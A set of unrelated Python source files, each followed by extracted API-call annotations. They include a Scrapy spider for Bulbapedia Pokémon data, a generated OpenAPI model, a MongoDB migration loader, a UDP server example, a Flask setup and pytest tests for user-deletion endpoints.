redirect, request\n'), ((13549, 13607), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/add-tag"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/add-tag', method='POST')\n", (13554, 13607), False, 'from bottle import template, route, redirect, request\n'), ((13802, 13863), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/remove-tag"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/remove-tag', method='POST')\n", (13807, 13863), False, 'from bottle import template, route, redirect, request\n'), ((14064, 14113), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/edit-metadata"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/edit-metadata')\n", (14069, 14113), False, 'from bottle import template, route, redirect, request\n'), ((14469, 14533), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/edit-metadata"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/edit-metadata', method='POST')\n", (14474, 14533), False, 'from bottle import template, route, redirect, request\n'), ((15692, 15739), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-link"""'], {}), "(f'{Wiki.PATH}{Article.PATH}/insert-link')\n", (15697, 15739), False, 'from bottle import template, route, redirect, request\n'), ((16177, 16239), 'bottle.route', 'route', (['f"""{Wiki.PATH}{Article.PATH}/insert-link"""'], {'method': '"""POST"""'}), "(f'{Wiki.PATH}{Article.PATH}/insert-link', method='POST')\n", (16182, 16239), False, 'from bottle import template, route, redirect, request\n'), ((881, 912), 'bottle.redirect', 'redirect', (['new_article.edit_link'], {}), '(new_article.edit_link)\n', (889, 912), False, 'from bottle import template, route, redirect, request\n'), ((1636, 1743), 'bottle.template', 'template', (['"""article.tpl"""'], {'articles': '[revision]', 'page_title': 'f"""{revision.title} ({wiki.title})"""', 'wiki': 'wiki'}), "('article.tpl', articles=[revision], page_title=\n f'{revision.title} ({wiki.title})', 
wiki=wiki)\n", (1644, 1743), False, 'from bottle import template, route, redirect, request\n'), ((1914, 2033), 'bottle.template', 'template', (['"""article_history.tpl"""'], {'article': 'article', 'page_title': 'f"""History: {article.title} ({wiki.title})"""', 'wiki': 'wiki'}), "('article_history.tpl', article=article, page_title=\n f'History: {article.title} ({wiki.title})', wiki=wiki)\n", (1922, 2033), False, 'from bottle import template, route, redirect, request\n'), ((13115, 13291), 'bottle.template', 'template', (['"""includes/modal.tpl"""'], {'title': '"""Edit article tags"""', 'body': 'f"""Existing tags (click to remove):<br/><div id="modal-tag-listing">{tags}</div><hr/>{body}"""', 'footer': '""""""'}), '(\'includes/modal.tpl\', title=\'Edit article tags\', body=\n f\'Existing tags (click to remove):<br/><div id="modal-tag-listing">{tags}</div><hr/>{body}\'\n , footer=\'\')\n', (13123, 13291), False, 'from bottle import template, route, redirect, request\n'), ((14997, 15094), 'bottle.template', 'template', (['"""includes/modal_metadata.tpl"""'], {'url': 'f"""{article.link}/edit-metadata"""', 'article': 'article'}), "('includes/modal_metadata.tpl', url=f'{article.link}/edit-metadata',\n article=article)\n", (15005, 15094), False, 'from bottle import template, route, redirect, request\n'), ((2269, 2355), 'models.Article', 'Article', ([], {'title': 'request.forms.article_title', 'content': 'request.forms.article_content'}), '(title=request.forms.article_title, content=request.forms.\n article_content)\n', (2276, 2355), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((9242, 9261), 'bottle.redirect', 'redirect', (['wiki.link'], {}), '(wiki.link)\n', (9250, 9261), False, 'from bottle import template, route, redirect, request\n'), ((9319, 9341), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (9327, 9341), False, 'from bottle import template, route, redirect, request\n'), ((10279, 10301), 
'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (10287, 10301), False, 'from bottle import template, route, redirect, request\n'), ((10351, 10373), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (10359, 10373), False, 'from bottle import template, route, redirect, request\n'), ((15214, 15240), 'models.Article.draft_of.is_null', 'Article.draft_of.is_null', ([], {}), '()\n', (15238, 15240), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((15242, 15271), 'models.Article.revision_of.is_null', 'Article.revision_of.is_null', ([], {}), '()\n', (15269, 15271), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((3407, 3443), 'bottle.redirect', 'redirect', (['article.draft_of.edit_link'], {}), '(article.draft_of.edit_link)\n', (3415, 3443), False, 'from bottle import template, route, redirect, request\n'), ((3736, 3891), 'models.Article', 'Article', ([], {'wiki': 'article.wiki', 'title': 'f"""Draft: {article.title}"""', 'content': 'article.content', 'author': 'article.author', 'created': 'article.created', 'draft_of': 'article'}), "(wiki=article.wiki, title=f'Draft: {article.title}', content=article\n .content, author=article.author, created=article.created, draft_of=article)\n", (3743, 3891), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((4544, 4567), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4565, 4567), False, 'import datetime\n'), ((4631, 4823), 'utils.Message', 'Message', (['"""This article was previously opened for editing without being saved. It may contain unsaved changes elsewhere. Use \'Save and Exit\' or \'Quit Editing\' to remove this message."""'], {}), '(\n "This article was previously opened for editing without being saved. It may contain unsaved changes elsewhere. 
Use \'Save and Exit\' or \'Quit Editing\' to remove this message."\n )\n', (4638, 4823), False, 'from utils import Message, Error, Unsafe\n'), ((5196, 5218), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (5204, 5218), False, 'from bottle import template, route, redirect, request\n'), ((5583, 5606), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5604, 5606), False, 'import datetime\n'), ((7761, 7798), 'models.Article.get', 'Article.get', (['(Article.id == article.id)'], {}), '(Article.id == article.id)\n', (7772, 7798), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((7880, 7935), 'utils.Message', 'Message', (['"""Article successfully saved."""'], {'color': '"""success"""'}), "('Article successfully saved.', color='success')\n", (7887, 7935), False, 'from utils import Message, Error, Unsafe\n'), ((8470, 8491), 'utils.Unsafe', 'Unsafe', (['article.title'], {}), '(article.title)\n', (8476, 8491), False, 'from utils import Message, Error, Unsafe\n'), ((10393, 10414), 'utils.Unsafe', 'Unsafe', (['article.title'], {}), '(article.title)\n', (10399, 10414), False, 'from utils import Message, Error, Unsafe\n'), ((14299, 14396), 'bottle.template', 'template', (['"""includes/modal_metadata.tpl"""'], {'url': 'f"""{article.link}/edit-metadata"""', 'article': 'article'}), "('includes/modal_metadata.tpl', url=f'{article.link}/edit-metadata',\n article=article)\n", (14307, 14396), False, 'from bottle import template, route, redirect, request\n'), ((15340, 15370), 'models.Article.title.contains', 'Article.title.contains', (['search'], {}), '(search)\n', (15362, 15370), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((5309, 5345), 'bottle.redirect', 'redirect', (['article.discard_draft_link'], {}), '(article.discard_draft_link)\n', (5317, 5345), False, 'from bottle import template, route, redirect, request\n'), ((6528, 6550), 'bottle.redirect', 'redirect', 
(['article.link'], {}), '(article.link)\n', (6536, 6550), False, 'from bottle import template, route, redirect, request\n'), ((8938, 9004), 'utils.Message', 'Message', (['warning'], {'yes': 'article.delete_confirm_link', 'no': 'article.link'}), '(warning, yes=article.delete_confirm_link, no=article.link)\n', (8945, 9004), False, 'from utils import Message, Error, Unsafe\n'), ((10805, 10878), 'utils.Message', 'Message', (['warning'], {'yes': 'article.discard_draft_confirm_link', 'no': 'article.link'}), '(warning, yes=article.discard_draft_confirm_link, no=article.link)\n', (10812, 10878), False, 'from utils import Message, Error, Unsafe\n'), ((15418, 15445), 'peewee.SQL', 'SQL', (['"""title COLLATE NOCASE"""'], {}), "('title COLLATE NOCASE')\n", (15421, 15445), False, 'from peewee import SQL\n'), ((3224, 3256), 'models.Wiki.title_to_url', 'Wiki.title_to_url', (['article.title'], {}), '(article.title)\n', (3241, 3256), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((7432, 7458), 'bottle.redirect', 'redirect', (['new_article.link'], {}), '(new_article.link)\n', (7440, 7458), False, 'from bottle import template, route, redirect, request\n'), ((9411, 9467), 'models.ArticleLinks.update', 'ArticleLinks.update', ([], {'link': 'article.title', 'valid_link': 'None'}), '(link=article.title, valid_link=None)\n', (9430, 9467), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n'), ((12311, 12338), 'peewee.SQL', 'SQL', (['"""title COLLATE NOCASE"""'], {}), "('title COLLATE NOCASE')\n", (12314, 12338), False, 'from peewee import SQL\n'), ((12498, 12525), 'peewee.SQL', 'SQL', (['"""title COLLATE NOCASE"""'], {}), "('title COLLATE NOCASE')\n", (12501, 12525), False, 'from peewee import SQL\n'), ((7693, 7715), 'bottle.redirect', 'redirect', (['article.link'], {}), '(article.link)\n', (7701, 7715), False, 'from bottle import template, route, redirect, request\n'), ((6096, 6117), 'utils.Unsafe', 'Unsafe', 
(['article_title'], {}), '(article_title)\n', (6102, 6117), False, 'from utils import Message, Error, Unsafe\n'), ((7632, 7668), 'bottle.redirect', 'redirect', (['article.draft_of.edit_link'], {}), '(article.draft_of.edit_link)\n', (7640, 7668), False, 'from bottle import template, route, redirect, request\n'), ((10055, 10076), 'utils.Unsafe', 'Unsafe', (['article.title'], {}), '(article.title)\n', (10061, 10076), False, 'from utils import Message, Error, Unsafe\n'), ((12448, 12474), 'models.Tag.title.contains', 'Tag.title.contains', (['search'], {}), '(search)\n', (12466, 12474), False, 'from models import Article, ArticleLinks, Wiki, Author, Tag, Metadata\n')] |
import scrapy
from scrapy.crawler import CrawlerProcess
def pkm_spider():
class PkmSpider(scrapy.Spider):
name = 'pkms'
def start_requests(self):
yield scrapy.Request('https://bulbapedia.bulbagarden.net/wiki/Bulbasaur_(Pok%C3%A9mon)')
def parse(self, response):
items = {}
# name = response.css('span.CurrentConditions--tempValue--1RYJJ::text').extract()
name = str(response.css('h1.firstHeading::text').get(default='Not Applicable').strip())[:-10]
next_pkm = str(response.xpath('//*[@id="mw-content-text"]/div/table[1]/tbody/tr[2]/td[3]/table/tbody/tr/td[1]/a/span/text()').get(default='Not Applicable').strip())[6:]
if next_pkm == 'plicable':
next_pkm = str(response.xpath('//*[@id="mw-content-text"]/div/table[1]/tbody/tr[1]/td[3]/table/tbody/tr/td[1]/a/span/text()').get(default='Not Applicable').strip())[6:]
else:
pass
type1 = response.xpath('//*[@id="mw-content-text"]/div/table[2]/tbody/tr[2]/td/table/tbody/tr/td[1]/table/tbody/tr/td[1]/a/span/b/text()').get(default='Not Applicable').strip()
type2 = response.xpath('//*[@id="mw-content-text"]/div/table[2]/tbody/tr[2]/td/table/tbody/tr/td[1]/table/tbody/tr/td[2]/a/span/b/text()').get(default='Not Applicable').strip()
items['name'] = name
items['type1'] = type1
items['type2'] = type2
yield items
yield scrapy.Request(f'https://bulbapedia.bulbagarden.net/wiki/{next_pkm}_(Pok%C3%A9mon)', callback=self.parse)
process = CrawlerProcess(settings={
'FEED_URI': 'pkmns_name_type.csv',
'FEED_FORMAT': 'csv'
})
process.crawl(PkmSpider)
process.start()
if __name__ == "__main__":
pkm_spider()
| [
"scrapy.crawler.CrawlerProcess",
"scrapy.Request"
] | [((1619, 1705), 'scrapy.crawler.CrawlerProcess', 'CrawlerProcess', ([], {'settings': "{'FEED_URI': 'pkmns_name_type.csv', 'FEED_FORMAT': 'csv'}"}), "(settings={'FEED_URI': 'pkmns_name_type.csv', 'FEED_FORMAT':\n 'csv'})\n", (1633, 1705), False, 'from scrapy.crawler import CrawlerProcess\n'), ((186, 273), 'scrapy.Request', 'scrapy.Request', (['"""https://bulbapedia.bulbagarden.net/wiki/Bulbasaur_(Pok%C3%A9mon)"""'], {}), "(\n 'https://bulbapedia.bulbagarden.net/wiki/Bulbasaur_(Pok%C3%A9mon)')\n", (200, 273), False, 'import scrapy\n'), ((1497, 1611), 'scrapy.Request', 'scrapy.Request', (['f"""https://bulbapedia.bulbagarden.net/wiki/{next_pkm}_(Pok%C3%A9mon)"""'], {'callback': 'self.parse'}), "(\n f'https://bulbapedia.bulbagarden.net/wiki/{next_pkm}_(Pok%C3%A9mon)',\n callback=self.parse)\n", (1511, 1611), False, 'import scrapy\n')] |
# coding: utf-8
"""
OOXML Automation
This API helps users convert Excel and Powerpoint documents into rich, live dashboards and stories. # noqa: E501
The version of the OpenAPI document: 0.1.0-no-tags
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class ChartPlotType(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type_id': 'int',
'plot_type_name': 'str',
'plot_qualifed_assy': 'str',
'row_col_type_id': 'int',
'id': 'str'
}
attribute_map = {
'type_id': 'typeId',
'plot_type_name': 'plotTypeName',
'plot_qualifed_assy': 'plotQualifedAssy',
'row_col_type_id': 'rowColTypeId',
'id': 'id'
}
def __init__(self, type_id=None, plot_type_name=None, plot_qualifed_assy=None, row_col_type_id=None, id=None): # noqa: E501
"""ChartPlotType - a model defined in OpenAPI""" # noqa: E501
self._type_id = None
self._plot_type_name = None
self._plot_qualifed_assy = None
self._row_col_type_id = None
self._id = None
self.discriminator = None
if type_id is not None:
self.type_id = type_id
self.plot_type_name = plot_type_name
self.plot_qualifed_assy = plot_qualifed_assy
if row_col_type_id is not None:
self.row_col_type_id = row_col_type_id
if id is not None:
self.id = id
@property
def type_id(self):
"""Gets the type_id of this ChartPlotType. # noqa: E501
:return: The type_id of this ChartPlotType. # noqa: E501
:rtype: int
"""
return self._type_id
@type_id.setter
def type_id(self, type_id):
"""Sets the type_id of this ChartPlotType.
:param type_id: The type_id of this ChartPlotType. # noqa: E501
:type: int
"""
self._type_id = type_id
@property
def plot_type_name(self):
"""Gets the plot_type_name of this ChartPlotType. # noqa: E501
:return: The plot_type_name of this ChartPlotType. # noqa: E501
:rtype: str
"""
return self._plot_type_name
@plot_type_name.setter
def plot_type_name(self, plot_type_name):
"""Sets the plot_type_name of this ChartPlotType.
:param plot_type_name: The plot_type_name of this ChartPlotType. # noqa: E501
:type: str
"""
self._plot_type_name = plot_type_name
@property
def plot_qualifed_assy(self):
"""Gets the plot_qualifed_assy of this ChartPlotType. # noqa: E501
:return: The plot_qualifed_assy of this ChartPlotType. # noqa: E501
:rtype: str
"""
return self._plot_qualifed_assy
@plot_qualifed_assy.setter
def plot_qualifed_assy(self, plot_qualifed_assy):
"""Sets the plot_qualifed_assy of this ChartPlotType.
:param plot_qualifed_assy: The plot_qualifed_assy of this ChartPlotType. # noqa: E501
:type: str
"""
self._plot_qualifed_assy = plot_qualifed_assy
@property
def row_col_type_id(self):
"""Gets the row_col_type_id of this ChartPlotType. # noqa: E501
:return: The row_col_type_id of this ChartPlotType. # noqa: E501
:rtype: int
"""
return self._row_col_type_id
@row_col_type_id.setter
def row_col_type_id(self, row_col_type_id):
"""Sets the row_col_type_id of this ChartPlotType.
:param row_col_type_id: The row_col_type_id of this ChartPlotType. # noqa: E501
:type: int
"""
self._row_col_type_id = row_col_type_id
@property
def id(self):
"""Gets the id of this ChartPlotType. # noqa: E501
:return: The id of this ChartPlotType. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ChartPlotType.
:param id: The id of this ChartPlotType. # noqa: E501
:type: str
"""
self._id = id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ChartPlotType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"six.iteritems"
] | [((4622, 4655), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (4635, 4655), False, 'import six\n')] |
import datetime
import gridfs # type: ignore
import pymongo # type: ignore
import tenacity
from typing import Optional
from dsw2to3.config import MongoConfig
from dsw2to3.errors import ERROR_HANDLER
from dsw2to3.logger import LOGGER
DOCUMENT_FS_COLLECTION = 'documentFs'
ASSETS_FS_COLLECTION = 'templateAssetFs'
def _fetch_file(fs: gridfs.GridFS, file_name: str) -> Optional[bytes]:
data = None
try:
file = fs.find_one({'filename': file_name})
if file is not None:
data = file.read()
file.close()
except Exception as e:
LOGGER.debug(f'Failed to retrieve file from GridFS '
f'with filename {file_name}: {e}')
return data
class MongoDB:
def __init__(self, config: MongoConfig):
self.config = config
self.client = pymongo.MongoClient(**self.config.mongo_client_kwargs)
self.db = self.client[self.config.database]
self.doc_fs = gridfs.GridFS(self.db, DOCUMENT_FS_COLLECTION)
self.asset_fs = gridfs.GridFS(self.db, ASSETS_FS_COLLECTION)
self.now = datetime.datetime.now()
def update_now(self):
self.now = datetime.datetime.now()
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def load_list(self, entity) -> list:
result = list()
for doc in self.db[entity.COLLECTION].find():
try:
result.append(entity.from_mongo(doc, self.now))
except Exception as e:
ERROR_HANDLER.error(
cause='MongoDB',
message=f'- cannot load {entity.__name__} '
f'({e}): {doc}'
)
LOGGER.info(f'- loaded {entity.__name__}: {len(result)} entries')
return result
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def load_nested(self, source_entity, target_entity, field: str):
result = list()
for doc in self.db[source_entity.COLLECTION].find():
children = doc.get(field, [])
try:
for child in children:
result.append(target_entity.from_mongo(doc, child, self.now))
except Exception as e:
ERROR_HANDLER.error(
cause='MongoDB',
message=f'- cannot load {target_entity.__name__} '
f'({e}): {doc}'
)
LOGGER.info(f'- loaded {target_entity.__name__}: {len(result)} entries')
return result
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def fetch_document(self, file_name: str) -> Optional[bytes]:
return _fetch_file(self.doc_fs, file_name)
@tenacity.retry(
reraise=True,
wait=tenacity.wait_exponential(multiplier=0.5),
stop=tenacity.stop_after_attempt(3),
)
def fetch_asset(self, file_name: str) -> Optional[bytes]:
return _fetch_file(self.asset_fs, file_name)
| [
"gridfs.GridFS",
"dsw2to3.logger.LOGGER.debug",
"datetime.datetime.now",
"dsw2to3.errors.ERROR_HANDLER.error",
"pymongo.MongoClient",
"tenacity.wait_exponential",
"tenacity.stop_after_attempt"
] | [((826, 880), 'pymongo.MongoClient', 'pymongo.MongoClient', ([], {}), '(**self.config.mongo_client_kwargs)\n', (845, 880), False, 'import pymongo\n'), ((955, 1001), 'gridfs.GridFS', 'gridfs.GridFS', (['self.db', 'DOCUMENT_FS_COLLECTION'], {}), '(self.db, DOCUMENT_FS_COLLECTION)\n', (968, 1001), False, 'import gridfs\n'), ((1026, 1070), 'gridfs.GridFS', 'gridfs.GridFS', (['self.db', 'ASSETS_FS_COLLECTION'], {}), '(self.db, ASSETS_FS_COLLECTION)\n', (1039, 1070), False, 'import gridfs\n'), ((1090, 1113), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1111, 1113), False, 'import datetime\n'), ((1160, 1183), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1181, 1183), False, 'import datetime\n'), ((587, 675), 'dsw2to3.logger.LOGGER.debug', 'LOGGER.debug', (['f"""Failed to retrieve file from GridFS with filename {file_name}: {e}"""'], {}), "(\n f'Failed to retrieve file from GridFS with filename {file_name}: {e}')\n", (599, 675), False, 'from dsw2to3.logger import LOGGER\n'), ((1241, 1282), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (1266, 1282), False, 'import tenacity\n'), ((1297, 1327), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (1324, 1327), False, 'import tenacity\n'), ((1923, 1964), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (1948, 1964), False, 'import tenacity\n'), ((1979, 2009), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (2006, 2009), False, 'import tenacity\n'), ((2753, 2794), 'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (2778, 2794), False, 'import tenacity\n'), ((2809, 2839), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (2836, 2839), False, 'import tenacity\n'), ((3020, 3061), 
'tenacity.wait_exponential', 'tenacity.wait_exponential', ([], {'multiplier': '(0.5)'}), '(multiplier=0.5)\n', (3045, 3061), False, 'import tenacity\n'), ((3076, 3106), 'tenacity.stop_after_attempt', 'tenacity.stop_after_attempt', (['(3)'], {}), '(3)\n', (3103, 3106), False, 'import tenacity\n'), ((1586, 1684), 'dsw2to3.errors.ERROR_HANDLER.error', 'ERROR_HANDLER.error', ([], {'cause': '"""MongoDB"""', 'message': 'f"""- cannot load {entity.__name__} ({e}): {doc}"""'}), "(cause='MongoDB', message=\n f'- cannot load {entity.__name__} ({e}): {doc}')\n", (1605, 1684), False, 'from dsw2to3.errors import ERROR_HANDLER\n'), ((2402, 2507), 'dsw2to3.errors.ERROR_HANDLER.error', 'ERROR_HANDLER.error', ([], {'cause': '"""MongoDB"""', 'message': 'f"""- cannot load {target_entity.__name__} ({e}): {doc}"""'}), "(cause='MongoDB', message=\n f'- cannot load {target_entity.__name__} ({e}): {doc}')\n", (2421, 2507), False, 'from dsw2to3.errors import ERROR_HANDLER\n')] |
from server import ThreadedUDPServer
import threading
# Create the server instance and assign the binding address for it
server = ThreadedUDPServer(('localhost', 9999))
# Set up a few example event handlers
@server.on('connected')
def connected(msg, socket):
""" Both 'connected' and 'disconnected' are events
reserved by the server. It will call them automatically.
"""
print("New client: {}".format(socket))
@server.on('message')
def got_message(msg, socket):
""" This is a custom event called "message".
When a client sends a message event, this handler
will repeat that message back to all connected clients.
"""
print("[{}]: {}".format(socket, msg))
server.send_all('message', msg)
if __name__ == "__main__":
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while True:
pass
server.shutdown()
| [
"threading.Thread",
"server.ThreadedUDPServer"
] | [((132, 170), 'server.ThreadedUDPServer', 'ThreadedUDPServer', (["('localhost', 9999)"], {}), "(('localhost', 9999))\n", (149, 170), False, 'from server import ThreadedUDPServer\n'), ((799, 844), 'threading.Thread', 'threading.Thread', ([], {'target': 'server.serve_forever'}), '(target=server.serve_forever)\n', (815, 844), False, 'import threading\n')] |
from flask import Flask
from flask_bootstrap import Bootstrap
from flask_socketio import SocketIO
from config import Config
import eventlet
eventlet.monkey_patch()
# where should I move this normally ?
async_mode = None
app = Flask(__name__)
bootstrap = Bootstrap(app)
socketio = SocketIO(app, async_mode='eventlet')
app.config.from_object(Config)
from app import routes
| [
"flask_bootstrap.Bootstrap",
"flask_socketio.SocketIO",
"eventlet.monkey_patch",
"flask.Flask"
] | [((140, 163), 'eventlet.monkey_patch', 'eventlet.monkey_patch', ([], {}), '()\n', (161, 163), False, 'import eventlet\n'), ((228, 243), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (233, 243), False, 'from flask import Flask\n'), ((256, 270), 'flask_bootstrap.Bootstrap', 'Bootstrap', (['app'], {}), '(app)\n', (265, 270), False, 'from flask_bootstrap import Bootstrap\n'), ((282, 318), 'flask_socketio.SocketIO', 'SocketIO', (['app'], {'async_mode': '"""eventlet"""'}), "(app, async_mode='eventlet')\n", (290, 318), False, 'from flask_socketio import SocketIO\n')] |
"""
Author: <NAME>
Date: 15 May 2021
"""
import json
from copy import deepcopy
import pytest
from flask import Response
from tests.functional.utils import FlaskTestRig, login, token_auth_header_field
@FlaskTestRig.setup_app(n_users=3)
def test_delete_me_no_auth_401(client_factory, make_users, **kwargs):
"""
Validate an Unauthorised error is returned when attempting to delete
the current user.
:endpoint: /api/v1/users/me
:method: DELETE
:auth: False
:params: None
:status: 401
:response: An unauthorised error.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = {
"error": "Unauthorised",
"message": "Invalid credentials."
}
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users/me")
# Get JSON data returned.
data = json.loads(res.data)
# Verify response matches expected.
assert data == expected
assert res.status_code == 401
@FlaskTestRig.setup_app(n_users=3)
def test_delete_me_with_auth_user_200(client_factory, make_users, **kwargs):
"""
Validate the current user can close their account.
:endpoint: /api/v1/users/me
:method: DELETE
:auth: True (Token)
:params: None
:status: 200
:response: A list of user objects.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = [{"username": "tinybear433", "id": 0}]
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users/me", headers=token_auth_header_field(token))
# Verify response matches expected.
assert json.loads(res.data) == expected
assert res.status_code == 200
login(rig.client, user, should_fail=True)
@FlaskTestRig.setup_app(n_users=3)
def test_delete_users_with_auth_user_401(client_factory, make_users, **kwargs):
"""
Validate a User role cannot bulk delete.
:endpoint: /api/v1/users
:method: DELETE
:auth: True (Token)
:params: None
:status: 401
:response: 401 error and message.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = {
'error': 'Unauthorised',
'message': 'Invalid credentials.'
}
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users", headers=token_auth_header_field(token))
# Verify response matches expected.
assert json.loads(res.data) == expected
assert res.status_code == 401
@FlaskTestRig.setup_app(n_users=10)
def test_delete_users_with_auth_admin_200(client_factory, make_users, **kwargs):
"""
Validate a Admin role can bulk delete.
:endpoint: /api/v1/users
:method: DELETE
:auth: True (Token)
:params: None
:status: 200
:response: id and username of deleted users.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
users_to_delete = {
"users": [
{"id": 0},
{"id": 2}
]
}
expected = rig.get_current_users(keep_email=True, keep_password=True)
expected = [expected[0], expected[2]]
expected_full = deepcopy(expected)
_ = [item.pop("last_login") for item in expected]
_ = [item.pop("email") for item in expected]
_ = [item.pop("password") for item in expected]
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True, admin_only=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users",
headers=token_auth_header_field(token),
data=json.dumps(users_to_delete))
# Verify response matches expected.
assert json.loads(res.data) == expected
assert res.status_code == 200
for user in expected_full:
login(rig.client, user, should_fail=True)
@FlaskTestRig.setup_app(n_users=10)
@pytest.mark.parametrize("user_id", [3, 4, 5, 6, 7])
def test_delete_user_id_with_auth_admin_200(user_id, client_factory, make_users, **kwargs):
"""
Validate a User role cannot bulk delete.
:endpoint: /api/v1/users
:method: DELETE
:auth: True (Token)
:params: None
:status: 200
:response: The username and id of the deleted user.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = rig.get_current_users(keep_email=True, keep_password=True)[user_id]
expected_full = deepcopy(expected)
_ = [expected.pop(item) for item in ["email", "last_login", "password"]]
print(expected)
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True, admin_only=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete(f"/api/v1/users/{user_id}",
headers=token_auth_header_field(token))
# Verify response matches expected.
assert json.loads(res.data) == [expected]
assert res.status_code == 200
login(rig.client, expected_full, should_fail=True)
| [
"json.loads",
"json.dumps",
"tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs",
"pytest.mark.parametrize",
"copy.deepcopy",
"tests.functional.utils.token_auth_header_field",
"tests.functional.utils.FlaskTestRig.setup_app",
"tests.functional.utils.login"
] | [((216, 249), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(3)'}), '(n_users=3)\n', (238, 249), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1026, 1059), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(3)'}), '(n_users=3)\n', (1048, 1059), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1936, 1969), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(3)'}), '(n_users=3)\n', (1958, 1969), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2829, 2863), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(10)'}), '(n_users=10)\n', (2851, 2863), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4259, 4293), 